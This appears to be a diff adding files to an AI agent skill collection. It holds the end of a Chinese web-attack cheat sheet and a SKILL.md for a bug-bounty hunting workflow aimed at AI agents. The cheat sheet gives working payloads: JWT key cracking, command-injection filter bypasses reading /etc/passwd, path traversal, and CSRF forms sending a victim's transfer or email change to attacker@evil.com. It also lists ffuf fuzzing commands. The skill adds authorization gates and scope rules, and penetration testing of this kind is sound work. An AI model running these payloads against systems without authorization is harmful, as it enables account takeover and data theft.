|
+
|
|
196
|
+
### 常见 IDOR 位置
|
|
197
|
+
|
|
198
|
+
```text
|
|
199
|
+
- /api/users/{id}
|
|
200
|
+
- /api/orders/{id}
|
|
201
|
+
- /api/files/{id}/download
|
|
202
|
+
- /api/messages/{id}
|
|
203
|
+
- /api/invoices/{id}.pdf
|
|
204
|
+
- /profile?user_id=xxx
|
|
205
|
+
- /download?file_id=xxx
|
|
206
|
+
```
|
|
207
|
+
|
|
208
|
+
---
|
|
209
|
+
|
|
210
|
+
## 认证绕过
|
|
211
|
+
|
|
212
|
+
### JWT 攻击
|
|
213
|
+
|
|
214
|
+
```bash
|
|
215
|
+
# 算法混淆(none)
|
|
216
|
+
# Header: {"alg":"none","typ":"JWT"}
|
|
217
|
+
# 去掉签名部分
|
|
218
|
+
|
|
219
|
+
# 密钥爆破
|
|
220
|
+
hashcat -m 16500 jwt.txt wordlist.txt
|
|
221
|
+
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256
|
|
222
|
+
|
|
223
|
+
# RS256 → HS256 降级
|
|
224
|
+
# 用公钥作为 HMAC 密钥签名
|
|
225
|
+
```
|
|
226
|
+
|
|
227
|
+
### 密码重置漏洞
|
|
228
|
+
|
|
229
|
+
```text
|
|
230
|
+
□ 重置 token 可预测(时间戳/递增)
|
|
231
|
+
□ 重置链接不过期
|
|
232
|
+
□ Host 头注入(修改 Host → 重置链接指向攻击者)
|
|
233
|
+
□ 验证码可爆破(4-6 位无频率限制)
|
|
234
|
+
□ 邮箱/手机号参数可篡改
|
|
235
|
+
```
|
|
236
|
+
|
|
237
|
+
---
|
|
238
|
+
|
|
239
|
+
## 命令注入
|
|
240
|
+
|
|
241
|
+
### 检测
|
|
242
|
+
|
|
243
|
+
```bash
|
|
244
|
+
# Linux
|
|
245
|
+
; id
|
|
246
|
+
| id
|
|
247
|
+
`id`
|
|
248
|
+
$(id)
|
|
249
|
+
; sleep 5
|
|
250
|
+
| sleep 5
|
|
251
|
+
|
|
252
|
+
# Windows
|
|
253
|
+
& whoami
|
|
254
|
+
| whoami
|
|
255
|
+
; dir
|
|
256
|
+
`dir`
|
|
257
|
+
```
|
|
258
|
+
|
|
259
|
+
### 绕过
|
|
260
|
+
|
|
261
|
+
```bash
|
|
262
|
+
# 空格绕过
|
|
263
|
+
cat${IFS}/etc/passwd
|
|
264
|
+
{cat,/etc/passwd}
|
|
265
|
+
cat</etc/passwd
|
|
266
|
+
|
|
267
|
+
# 关键字绕过
|
|
268
|
+
c'a't /etc/passwd
|
|
269
|
+
c""at /etc/passwd
|
|
270
|
+
/bin/c?t /etc/passwd
|
|
271
|
+
```
|
|
272
|
+
|
|
273
|
+
---
|
|
274
|
+
|
|
275
|
+
## 目录遍历
|
|
276
|
+
|
|
277
|
+
### Payload
|
|
278
|
+
|
|
279
|
+
```text
|
|
280
|
+
../../../etc/passwd
|
|
281
|
+
..%2f..%2f..%2fetc/passwd
|
|
282
|
+
....//....//....//etc/passwd
|
|
283
|
+
..%252f..%252f..%252fetc/passwd
|
|
284
|
+
/..%c0%af../..%c0%af../etc/passwd
|
|
285
|
+
```
|
|
286
|
+
|
|
287
|
+
### Windows
|
|
288
|
+
|
|
289
|
+
```text
|
|
290
|
+
..\..\..\windows\win.ini
|
|
291
|
+
..%5c..%5c..%5cwindows%5cwin.ini
|
|
292
|
+
```
|
|
293
|
+
|
|
294
|
+
---
|
|
295
|
+
|
|
296
|
+
## CSRF(跨站请求伪造)
|
|
297
|
+
|
|
298
|
+
### 检测
|
|
299
|
+
|
|
300
|
+
```text
|
|
301
|
+
□ 关键操作无 CSRF Token
|
|
302
|
+
□ Token 不验证(删除 token 参数仍可请求)
|
|
303
|
+
□ Token 不绑定会话(A 的 token 可用于 B)
|
|
304
|
+
□ Referer 检查可绕过(空 Referer)
|
|
305
|
+
□ JSON 请求无 Content-Type 校验
|
|
306
|
+
```
|
|
307
|
+
|
|
308
|
+
### 利用
|
|
309
|
+
|
|
310
|
+
```html
|
|
311
|
+
<!-- 自动提交表单 -->
|
|
312
|
+
<form action="https://target.com/transfer" method="POST">
|
|
313
|
+
<input name="to" value="attacker">
|
|
314
|
+
<input name="amount" value="10000">
|
|
315
|
+
</form>
|
|
316
|
+
<script>document.forms[0].submit();</script>
|
|
317
|
+
|
|
318
|
+
<!-- JSON CSRF -->
|
|
319
|
+
<script>
|
|
320
|
+
fetch('https://target.com/api/change-email', {
|
|
321
|
+
method: 'POST',
|
|
322
|
+
credentials: 'include',
|
|
323
|
+
headers: {'Content-Type': 'text/plain'},
|
|
324
|
+
body: '{"email":"attacker@evil.com"}'
|
|
325
|
+
});
|
|
326
|
+
</script>
|
|
327
|
+
```
|
|
328
|
+
|
|
329
|
+
---
|
|
330
|
+
|
|
331
|
+
## 信息泄露
|
|
332
|
+
|
|
333
|
+
### 常见泄露点
|
|
334
|
+
|
|
335
|
+
```bash
|
|
336
|
+
# 配置文件
|
|
337
|
+
/.env
|
|
338
|
+
/config.php.bak
|
|
339
|
+
/web.config
|
|
340
|
+
/.git/config
|
|
341
|
+
/.svn/entries
|
|
342
|
+
|
|
343
|
+
# 调试信息
|
|
344
|
+
/debug
|
|
345
|
+
/trace
|
|
346
|
+
/actuator/env (Spring Boot)
|
|
347
|
+
/swagger-ui.html (API 文档)
|
|
348
|
+
/__debug__ (Django)
|
|
349
|
+
|
|
350
|
+
# 备份文件
|
|
351
|
+
/backup.sql
|
|
352
|
+
/db.sql.gz
|
|
353
|
+
/site.tar.gz
|
|
354
|
+
/*.bak
|
|
355
|
+
```
|
|
356
|
+
|
|
357
|
+
### FFUF 发现
|
|
358
|
+
|
|
359
|
+
```bash
|
|
360
|
+
# 目录爆破
|
|
361
|
+
ffuf -u https://target.com/FUZZ -w /path/to/SecLists/Discovery/Web-Content/common.txt
|
|
362
|
+
|
|
363
|
+
# 参数发现
|
|
364
|
+
ffuf -u "https://target.com/api?FUZZ=test" -w /path/to/SecLists/Discovery/Web-Content/burp-parameter-names.txt -fs 0
|
|
365
|
+
|
|
366
|
+
# 子域名爆破
|
|
367
|
+
ffuf -u https://FUZZ.target.com -w /path/to/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
|
|
368
|
+
|
|
369
|
+
# 虚拟主机发现
|
|
370
|
+
ffuf -u https://target.com -H "Host: FUZZ.target.com" -w subdomains.txt -fs 0
|
|
371
|
+
```
|
|
372
|
+
|
|
373
|
+
---
|
|
374
|
+
|
|
375
|
+
## 防御建议速查
|
|
376
|
+
|
|
377
|
+
| 漏洞 | 核心防御 |
|
|
378
|
+
|------|---------|
|
|
379
|
+
| SQL 注入 | 参数化查询(PreparedStatement) |
|
|
380
|
+
| XSS | 输出编码 + CSP + HttpOnly Cookie |
|
|
381
|
+
| SSRF | 白名单 URL + 禁止内网 IP + 禁止非 HTTP 协议 |
|
|
382
|
+
| 文件上传 | 白名单后缀 + 重命名 + 独立存储域 + 文件头校验 |
|
|
383
|
+
| IDOR | 服务端鉴权(不信任客户端传的 ID) |
|
|
384
|
+
| CSRF | SameSite Cookie + CSRF Token + Referer 校验 |
|
|
385
|
+
| 命令注入 | 避免拼接命令 + 白名单参数 + 沙箱执行 |
|
|
386
|
+
| 目录遍历 | 规范化路径 + chroot + 白名单文件 |
|
|
387
|
+
| JWT | 强密钥 + RS256 + 短过期 + 黑名单 |
|
|
@@ -0,0 +1,243 @@
|
|
|
1
|
+
---
|
|
2
|
+
name: src-hunter
|
|
3
|
+
description: "Bug-bounty/SRC vulnerability-hunting workflow: five-phase methodology (intake, recon, enumeration, hunt, report) with attack playbooks for SQLi, XSS, RCE, SSRF, IDOR, CSRF, path traversal, and file upload."
|
|
4
|
+
risk: offensive
|
|
5
|
+
source: "https://github.com/zhaoxuya520/reverse-skill"
|
|
6
|
+
source_repo: "zhaoxuya520/reverse-skill"
|
|
7
|
+
source_type: community
|
|
8
|
+
date_added: "2026-08-25"
|
|
9
|
+
license: "MIT"
|
|
10
|
+
license_source: "https://github.com/zhaoxuya520/reverse-skill/blob/main/LICENSE"
|
|
11
|
+
---
|
|
12
|
+
> **⚠️ AUTHORIZED USE ONLY**
|
|
13
|
+
> This skill is for educational purposes or authorized security assessments only.
|
|
14
|
+
> You must have explicit, written permission from the system owner before using this tool.
|
|
15
|
+
> Misuse of this tool is illegal and strictly prohibited.
|
|
16
|
+
|
|
17
|
+
> **Mandatory confirmation gate**
|
|
18
|
+
> Before running any command that probes, exploits, changes, persists on, extracts data from, or attempts credential access against a target:
|
|
19
|
+
> 1. Ask the user to state the exact target URL, IP, account, or resource.
|
|
20
|
+
> 2. Ask the user to confirm written authorization and the permitted scope.
|
|
21
|
+
> 3. Show the exact command(s) and explain their expected effect.
|
|
22
|
+
> 4. Wait for explicit confirmation in the current conversation.
|
|
23
|
+
>
|
|
24
|
+
> Without that confirmation, remain read-only and provide defensive guidance only. Prefer a sandbox, disposable VM, or controlled lab.
|
|
25
|
+
|
|
26
|
+
## When to Use
|
|
27
|
+
|
|
28
|
+
- Hunting vulnerabilities in bug-bounty programs within program policy.
|
|
29
|
+
- Following a disciplined methodology instead of ad-hoc testing.
|
|
30
|
+
|
|
31
|
+
## 何时使用本 skill
|
|
32
|
+
|
|
33
|
+
**关键词命中**:
|
|
34
|
+
- "src 挖洞" / "src 漏洞" / "src 测试" / "Security Response Center"
|
|
35
|
+
- "bug bounty" / "漏洞赏金" / "众测"
|
|
36
|
+
- "hackerone" / "h1" / "bugcrowd" / "intigriti" / "yeswehack"
|
|
37
|
+
- "如何挖 / 怎么测 / 怎么打 + 某目标 / 某接口 / 某参数"
|
|
38
|
+
- "WAF 绕过" / "绕过 WAF" / "WAF bypass"
|
|
39
|
+
- "任意账号 / 任意修改 / 任意删除 / 任意操作" 类越权
|
|
40
|
+
- "密码重置" / "找回密码" 类逻辑
|
|
41
|
+
- "未授权访问" / "默认凭据" / "Actuator" / "Spring 暴露" / "Redis 未授权"
|
|
42
|
+
- 用户给一个 URL 或 API endpoint 让你测
|
|
43
|
+
|
|
44
|
+
**不应使用本 skill**:
|
|
45
|
+
- 纯白盒源码审计(用 `code-audit` skill)
|
|
46
|
+
- 已知漏洞的修复 / 防御问答(用通用对话)
|
|
47
|
+
- 单独的 CTF 题目(这是真实环境工作流)
|
|
48
|
+
|
|
49
|
+
---
|
|
50
|
+
|
|
51
|
+
## 工作流 — 5 阶段
|
|
52
|
+
|
|
53
|
+
### Phase 1 · Intake(接单)
|
|
54
|
+
|
|
55
|
+
输入:程序名 / SRC 入口 URL / 子域。
|
|
56
|
+
|
|
57
|
+
要做的事:
|
|
58
|
+
- 抓 Scope(in-scope domains / IPs / mobile apps / API endpoints)
|
|
59
|
+
- 抓 Out-of-scope(禁测内容、第三方服务、cloud assets exclusions)
|
|
60
|
+
- 抓规则(payout tiers、disclosure window、retest policy、safe-harbor)
|
|
61
|
+
- 抓测试账号 / 测试 header(如 `X-Bug-Bounty: <handle>`)
|
|
62
|
+
|
|
63
|
+
**优先级判断**(基于命中类型预估命中率,参考 `references/methodology/05-srctimebox-priority.md`):
|
|
64
|
+
- 6 小时窗口 → 跑高命中率类型(密码重置 88% / 任意账号 86.4% / 提现 83.1%)
|
|
65
|
+
- 单日窗口 → 加上信息泄露 + 资产暴露 + Actuator
|
|
66
|
+
- HVV / 重点期 → 全谱
|
|
67
|
+
|
|
68
|
+
→ 详见 [`references/methodology/00-index.md`](references/methodology/00-index.md)
|
|
69
|
+
|
|
70
|
+
### Phase 2 · Recon(被动侦察)
|
|
71
|
+
|
|
72
|
+
不发包给目标的情报收集:
|
|
73
|
+
|
|
74
|
+
- **CT 日志**:crt.sh / Censys(找子域)
|
|
75
|
+
- **历史快照**:Wayback / CommonCrawl
|
|
76
|
+
- **GitHub 搜索**:`org:target` + 关键词(password / api_key / SECRET)
|
|
77
|
+
- **搜索引擎 dorks**:`site:target.com inurl:/admin`、`filetype:env`、`intitle:Index of`
|
|
78
|
+
- **ASN / IP 段**:bgp.he.net 找 IP 块
|
|
79
|
+
- **Favicon hash**:FOFA / Shodan 找同 favicon 资产
|
|
80
|
+
- **DNS 历史**:SecurityTrails / Whoisxmlapi
|
|
81
|
+
|
|
82
|
+
### Phase 3 · Enum(主动探测)
|
|
83
|
+
|
|
84
|
+
**资产枚举**:
|
|
85
|
+
- 子域:amass / subfinder / puredns / dnsx
|
|
86
|
+
- 存活:httpx / naabu
|
|
87
|
+
- 截图:gowitness / aquatone
|
|
88
|
+
- 内容发现:ffuf / feroxbuster / dirsearch
|
|
89
|
+
- 技术指纹:wappalyzer / webanalyze(同时查 `references/dictionaries/chinese-srcfingerprints.md` 命中国产组件)
|
|
90
|
+
- JS 提取:linkfinder / subjs / gau / katana
|
|
91
|
+
- 子域接管指纹:subjack / subzy
|
|
92
|
+
|
|
93
|
+
### Phase 4 · Hunt(漏洞探测)
|
|
94
|
+
|
|
95
|
+
按攻击类型走对应 playbook,**每个 playbook 都包含**:方法论 + 参数频率表 + 真实 H1 案例 + 结构化 payload + WAF 绕过变体。
|
|
96
|
+
|
|
97
|
+
**优先级路径**(按命中率 + 价值排序):
|
|
98
|
+
|
|
99
|
+
| Playbook | 入口提示 | 文件 |
|
|
100
|
+
|---|---|---|
|
|
101
|
+
| **未授权访问** | Actuator/Swagger/默认端口/弱密码 | `references/playbooks/unauth-access.md` |
|
|
102
|
+
| **信息泄露** | .git/.svn/.env/heapdump/路径列举 | `references/playbooks/info-disclosure.md` |
|
|
103
|
+
| **任意 X 越权** | 用户态 ID 可遍历/可修改 | `references/playbooks/arbitrary-x-authz.md` |
|
|
104
|
+
| **业务逻辑** | 密码重置/支付/订单/验证码 | `references/playbooks/logic-flaws.md` |
|
|
105
|
+
| **OAuth/SAML/JWT** | 认证流/redirect_uri/token | `references/playbooks/oauth-saml-jwt.md` |
|
|
106
|
+
| **API REST** | BOLA/Mass Assignment/速率 | `references/playbooks/api-rest.md` |
|
|
107
|
+
| **SQLi** | 任何用户输入进 DB | `references/playbooks/sqli.md` |
|
|
108
|
+
| **RCE** | 反序列化/SSTI/XXE/原型链/框架 | `references/playbooks/rce.md` |
|
|
109
|
+
| **SSRF** | URL 入参/缓存/Host 注入 | `references/playbooks/ssrf-cache-host.md` |
|
|
110
|
+
| **路径遍历** | 文件路径入参/LFI/RFI | `references/playbooks/path-traversal.md` |
|
|
111
|
+
| **文件上传** | 上传点 + 解析漏洞 | `references/playbooks/file-upload.md` |
|
|
112
|
+
| **XSS** | 任何用户输入进 HTML/JS | `references/playbooks/xss.md` |
|
|
113
|
+
| **HTTP 走私** | 反代 + Content-Length | `references/playbooks/http-smuggling.md` |
|
|
114
|
+
| **GraphQL** | introspection/嵌套 | `references/playbooks/graphql.md` |
|
|
115
|
+
| **竞态** | 并发请求 / TOCTOU | `references/playbooks/race-conditions.md` |
|
|
116
|
+
| **DoS** | ReDoS / 资源不限速 / 算法爆炸 | `references/playbooks/dos.md` |
|
|
117
|
+
| **移动端** | Android / iOS APK | `references/playbooks/mobile.md` |
|
|
118
|
+
| **LLM Agent** | Prompt 注入 / 工具调用 | `references/playbooks/llm-prompt-injection.md` |
|
|
119
|
+
| **内网后渗透** | 凭据 / 横向 / 域 | `references/playbooks/intranet-postexp.md` |
|
|
120
|
+
|
|
121
|
+
**通用方法论**(不分攻击类型):
|
|
122
|
+
|
|
123
|
+
| 文档 | 关键内容 |
|
|
124
|
+
|---|---|
|
|
125
|
+
| [`methodology/01-attack-priority.md`](references/methodology/01-attack-priority.md) | RCE>文件写>认证绕过>注入>信息泄露 价值排序 |
|
|
126
|
+
| [`methodology/02-bypass-toolkit.md`](references/methodology/02-bypass-toolkit.md) | 通用绕过决策树 + 编码 / 混淆 / WAF |
|
|
127
|
+
| [`methodology/03-evidence-discipline.md`](references/methodology/03-evidence-discipline.md) | 黑盒证据规则 + 反幻觉 + 合规 |
|
|
128
|
+
| [`methodology/04-control-gap-hunting.md`](references/methodology/04-control-gap-hunting.md) | 9 类敏感操作 → 应有控制 → 探测缺失 |
|
|
129
|
+
| [`methodology/05-srctimebox-priority.md`](references/methodology/05-srctimebox-priority.md) | 6h / 单日 / HVV / 月度 时间盒模板 |
|
|
130
|
+
|
|
131
|
+
**行业垂直 playbook**(资产相关时优先看):
|
|
132
|
+
|
|
133
|
+
| 行业 | 文档 | 何时用 |
|
|
134
|
+
|---|---|---|
|
|
135
|
+
| 银行 / 支付 / 金融 | [`industry/banking-finance.md`](references/industry/banking-finance.md) | 目标含支付 / 网银 / 第三方支付聚合 |
|
|
136
|
+
| 电信 / ISP | [`industry/telecom-isp.md`](references/industry/telecom-isp.md) | 目标是运营商 / BOSS / 网管 / 物联网卡 |
|
|
137
|
+
|
|
138
|
+
**字典 / 凭据**:
|
|
139
|
+
|
|
140
|
+
| 文档 | 用途 |
|
|
141
|
+
|---|---|
|
|
142
|
+
| [`dictionaries/default-credentials-cn.md`](references/dictionaries/default-credentials-cn.md) | 致远 / 通达 / 万户 / 泛微 / 用友 / 金蝶 / 华为 / 中兴 / 海康等国产凭据 |
|
|
143
|
+
| [`dictionaries/chinese-srcfingerprints.md`](references/dictionaries/chinese-srcfingerprints.md) | 国产 OA / 中间件指纹 + 高频参数 + 一键检测命令 |
|
|
144
|
+
|
|
145
|
+
### Phase 5 · Report(提交)
|
|
146
|
+
|
|
147
|
+
→ 用模板 [`templates/report-submission.md`](references/templates/report-submission.md)
|
|
148
|
+
|
|
149
|
+
**三段式骨架**:
|
|
150
|
+
1. **标题**:精确到 endpoint + 漏洞类型,不超过 80 字
|
|
151
|
+
2. **重现步骤**:每步可执行 / 截图 / HAR
|
|
152
|
+
3. **影响 + 修复建议**:CVSS 4.0 vector + 业务影响段
|
|
153
|
+
|
|
154
|
+
---
|
|
155
|
+
|
|
156
|
+
## MCP 工具集成
|
|
157
|
+
|
|
158
|
+
本 skill 支持调用本地 MCP 服务器作为工具层。**主选 jshookmcp**(134 工具精选 / 386 全集 / 36 域,内置 Burp Suite bridge / Frida / WASM / 反调试 / Android adb / sourcemap 重构)。完整索引与场景映射:
|
|
159
|
+
|
|
160
|
+
→ [`references/tools/mcp-jshook.md`](references/tools/mcp-jshook.md)
|
|
161
|
+
|
|
162
|
+
默认推荐 `search` profile(上下文成本 ~3K token),通过 `mcp__jshook__search_tools` + `mcp__jshook__activate_tools` 按需激活,避免 `full` profile 一次性加载 40K+ token。
|
|
163
|
+
|
|
164
|
+
---
|
|
165
|
+
|
|
166
|
+
## 数据资产规模
|
|
167
|
+
|
|
168
|
+
| 类别 | 量级 |
|
|
169
|
+
|---|---|
|
|
170
|
+
| 攻击类 playbook | 19 个 |
|
|
171
|
+
| 通用方法论文档 | 6 个 |
|
|
172
|
+
| 行业垂直 playbook | 2 个(银行 / 电信) |
|
|
173
|
+
| 字典 / 凭据 | 3 个 |
|
|
174
|
+
| 报告模板 | 1 个 |
|
|
175
|
+
| 结构化 payload | **305 条**(177 web + 128 内网) |
|
|
176
|
+
| WAF / EDR 绕过变体 | **263 个步骤**,覆盖 23 类 Web 攻击 |
|
|
177
|
+
| 工具命令速查 | 114 条(Nmap/SQLMap/Burp/MSF/...) |
|
|
178
|
+
| HackerOne 真实案例(已披露 High/Critical) | **2887 份**,按 weakness 分到 141 个分类 MD |
|
|
179
|
+
| WooYun 历史案例统计(不可再生) | 88,636 条 |
|
|
180
|
+
|
|
181
|
+
H1 真实案例已**直接嵌入对应 playbook 末尾**(每个 playbook 末尾有"H1 真实案例" Top 12 表 + 摘要)。
|
|
182
|
+
|
|
183
|
+
---
|
|
184
|
+
|
|
185
|
+
## 合规与合法红线
|
|
186
|
+
|
|
187
|
+
每个 playbook 末段都有"不要做的事"。通用红线(任何 SRC 都遵守):
|
|
188
|
+
|
|
189
|
+
- ❌ 出 scope 的资产 / 域名 → 立即停手并报备
|
|
190
|
+
- ❌ 实际取走他人 PII → 仅证明可访问,立即销毁
|
|
191
|
+
- ❌ 持续负载 / DoS / 大流量 → 仅 1–3 个 PoC 包,立即停止
|
|
192
|
+
- ❌ 修改他人数据(即使有写权限)→ 仅在自己控制的对象上验证
|
|
193
|
+
- ❌ 在生产做钓鱼或社工 → 不做
|
|
194
|
+
- ❌ 提交未复现的猜测 → 必须有 HTTP 包 / 截图 / 视频证据
|
|
195
|
+
- ✅ 测试 header 标记自己(如 `X-Bug-Bounty: <handle>`)
|
|
196
|
+
- ✅ 用自己的两个账号自演越权场景
|
|
197
|
+
- ✅ 用 OOB 域名做 SSRF 探测,不要用别人的 DNSLog
|
|
198
|
+
- ✅ 提交前用 `references/templates/report-submission.md` 自查
|
|
199
|
+
|
|
200
|
+
---
|
|
201
|
+
|
|
202
|
+
## CLI 助记前缀
|
|
203
|
+
|
|
204
|
+
`srchunter`(如:`srchunter scope set <program>`、`srchunter recon run`、`srchunter findings new <type>`)。当前未实现 CLI,仅作命名约定。
|
|
205
|
+
|
|
206
|
+
---
|
|
207
|
+
|
|
208
|
+
## 引用 / 跨链结构
|
|
209
|
+
|
|
210
|
+
```
|
|
211
|
+
src-hunter/
|
|
212
|
+
├── SKILL.md # 本文件 — skill 入口
|
|
213
|
+
├── README.md # 项目说明
|
|
214
|
+
└── references/
|
|
215
|
+
├── methodology/ 6 docs # 通用打法
|
|
216
|
+
├── playbooks/ 19 docs # 攻击类 playbook(每个含 H1 案例 + Payload 库)
|
|
217
|
+
├── industry/ 3 docs # 行业垂直
|
|
218
|
+
├── dictionaries/ 3 docs # 字典 / 凭据
|
|
219
|
+
├── templates/ 1 doc # 报告模板
|
|
220
|
+
├── h1-reports/ # 2887 份 H1 报告原始数据 + 141 类 MD
|
|
221
|
+
│ ├── raw/ # 原始 JSON(resume / 二次分析用)
|
|
222
|
+
│ └── by-weakness/ # 按 CWE 分类的 Markdown
|
|
223
|
+
└── payloader/ # 305 条结构化 payload 数据
|
|
224
|
+
├── raw/ # JSON(机读)
|
|
225
|
+
├── by-category/ # 按分类的 MD
|
|
226
|
+
├── tools/ # 工具命令
|
|
227
|
+
└── waf-bypass.md # 263 步骤 WAF 绕过集
|
|
228
|
+
```
|
|
229
|
+
|
|
230
|
+
|
|
231
|
+
## 任务完成自检(声称完成前 MUST 通过)
|
|
232
|
+
|
|
233
|
+
- [ ] 我是否执行了工作流中的每一步(而不是只阅读)?
|
|
234
|
+
- [ ] 我是否基于 `tool-index` 使用了真实工具路径?
|
|
235
|
+
- [ ] 我是否产出了可复现证据(命令/脚本/截图/报告)?
|
|
236
|
+
- [ ] 我是否完成并回写了 RULES 要求的 Checklist 项?
|
|
237
|
+
|
|
238
|
+
## Limitations
|
|
239
|
+
|
|
240
|
+
- Strictly respect each program's policy, scope, and rate limits.
|
|
241
|
+
- Playbook depth varies; novel logic flaws still require creativity.
|
|
242
|
+
|
|
243
|
+
> Adapted from [zhaoxuya520/reverse-skill](https://github.com/zhaoxuya520/reverse-skill) (MIT).
|